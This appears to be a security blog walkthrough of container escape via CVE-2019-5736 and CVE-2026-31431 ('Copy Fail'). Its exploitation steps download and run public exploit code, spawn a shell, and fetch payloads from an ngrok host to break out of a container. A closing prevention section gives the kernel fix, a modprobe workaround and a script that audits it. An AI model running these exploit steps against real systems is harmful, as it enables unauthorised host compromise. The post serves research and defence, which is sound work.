Date
June 1, 2026
Author
Karan Patel, CEO

Description

In 2026, most real-world escape paths are no longer “simple tricks”. They depend on a rare kernel-level vulnerability in the shared host kernel, serious misconfigurations (like privileged containers or exposed Docker sockets), or complex chains that exploit subtle gaps between isolation layers. Widespread adoption of rootless containers, hardened seccomp profiles, and minimal base images has also significantly reduced the attack surface, so attackers must often combine multiple weaknesses rather than rely on a single flaw. Reliable container escape in modern environments is therefore difficult, noisy, and heavily environment-dependent.

Methodology

CVEs

CVE-2019-5736

During docker exec, runc opens “/proc/self/exe” (which points to the runc binary on the host) via a symlink in the container filesystem. By controlling when and how this symlink resolves, the container can write to the host runc binary while it is being executed.

Figure 1: CVE-2019-5736

CVE-2026-31431 (Docker Escape)

During docker exec, runc opens “/proc/self/exe” (which points to the runc binary on the host) via a symlink in the container filesystem. Because the page cache is global, an attacker who corrupts the page cache can write to the host runc binary while it is being executed.

Figure 2: CVE-2026-31431

Exploitation

1. Start with low-privilege user access within a container environment.

Figure 3: Low Level User

2. Download the Copy-Fail exploit, grant it executable permissions, and run it using the following commands.

wget https://raw.githubusercontent.com/seanrickerd/cve-2026-31431/main/exploit.py
chmod +x exploit.py
python3 exploit.py
python3 -c 'import pty; pty.spawn("/bin/bash")'
Figure 4: Run Copy-fail Exploit

3. Observed successful privilege escalation.

Figure 5: Escalated Privs


4. Execute the following commands on the attacker system (ensure payload.c is appropriately modified before compilation).

git clone https://github.com/hans362/CVE-2026-31431-Copy-Fail-Container-Escape.git
cd CVE-2026-31431-Copy-Fail-Container-Escape
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
ls -la
Figure 6: CVE-2026-31431-Copy-Fail-Container-Escape.git


5. Run the following commands inside the Docker container.

cd tmp
wget <ngrok-link>/exp.sh
wget <ngrok-link>/exploit
chmod +x exp.sh exploit
./exp.sh
Figure 7: Escaping Container (1)

Figure 8: Escaping Container (2)

6. Optional: From the host, run docker exec <your_container> /bin/true, simulating an automated CI/CD-style task execution.

Figure 9: Executing container (runc)


7. Observed successful command execution on the host system.

Figure 10: Successful Container Escape (1)

     

Figure 11: Successful Container Escape (2)

Prevention

Update your distribution's kernel package to one that includes mainline commit “a664bf3d603d”. It reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.

Commands:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
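
To confirm the workaround above actually took effect on a host, the following added example (not part of the original post or the referenced projects) reports whether algif_aead is still loaded, blocked by an install rule, or still loadable. The function names, the LOADED/BLOCKED/LOADABLE labels and the sample files are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit the algif_aead workaround. Paths are parameters so the
# same check runs on a live host or on files collected from one.
MODULE=algif_aead

# True if the module is listed in a /proc/modules-style file ($1).
module_loaded() {
    awk -v m="$MODULE" '$1 == m { hit = 1 } END { exit !hit }' "${1:-/proc/modules}"
}

# True if a *.conf file in directory $1 maps the module to /bin/false or
# /bin/true with an "install" rule. Comment lines are skipped, and a bare
# "blacklist" line is not counted because it only affects alias lookups.
install_blocked() {
    for f in "${1:-/etc/modprobe.d}"/*.conf; do
        [ -f "$f" ] || continue
        awk -v m="$MODULE" '
            /^[ \t]*#/ { next }
            $1 == "install" {
                name = $2; gsub(/-/, "_", name)   # modprobe treats - and _ alike
                if (name == m && $3 ~ /^(\/usr)?\/bin\/(false|true)$/) hit = 1
            }
            END { exit !hit }' "$f" && return 0
    done
    return 1
}

# Prints LOADED, BLOCKED or LOADABLE for the given modules file and config dir.
audit_algif() {
    if module_loaded "$1"; then
        echo LOADED      # still resident: the rule alone does not unload it
    elif install_blocked "$2"; then
        echo BLOCKED
    else
        echo LOADABLE    # nothing stops a later load
    fi
}

# Constructed sample: the rule is present but the module was never unloaded.
demo=$(mktemp -d)
printf 'algif_aead 16384 0 - Live 0x0000000000000000\n' > "$demo/modules"
printf 'install algif_aead /bin/false\n' > "$demo/disable-algif.conf"
audit_algif "$demo/modules" "$demo"
rm -rf "$demo"
```

Calling audit_algif with no arguments checks /proc/modules and /etc/modprobe.d on the host itself.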


References

  • https://github.com/hans362/CVE-2026-31431-Copy-Fail-Container-Escape
  • https://github.com/SeanRickerd/cve-2026-31431
  • https://github.com/AliHzSec/CVE-2026-31431
  • https://github.com/shadowabi/CVE-2026-31431-CopyFail-Universal-LPE
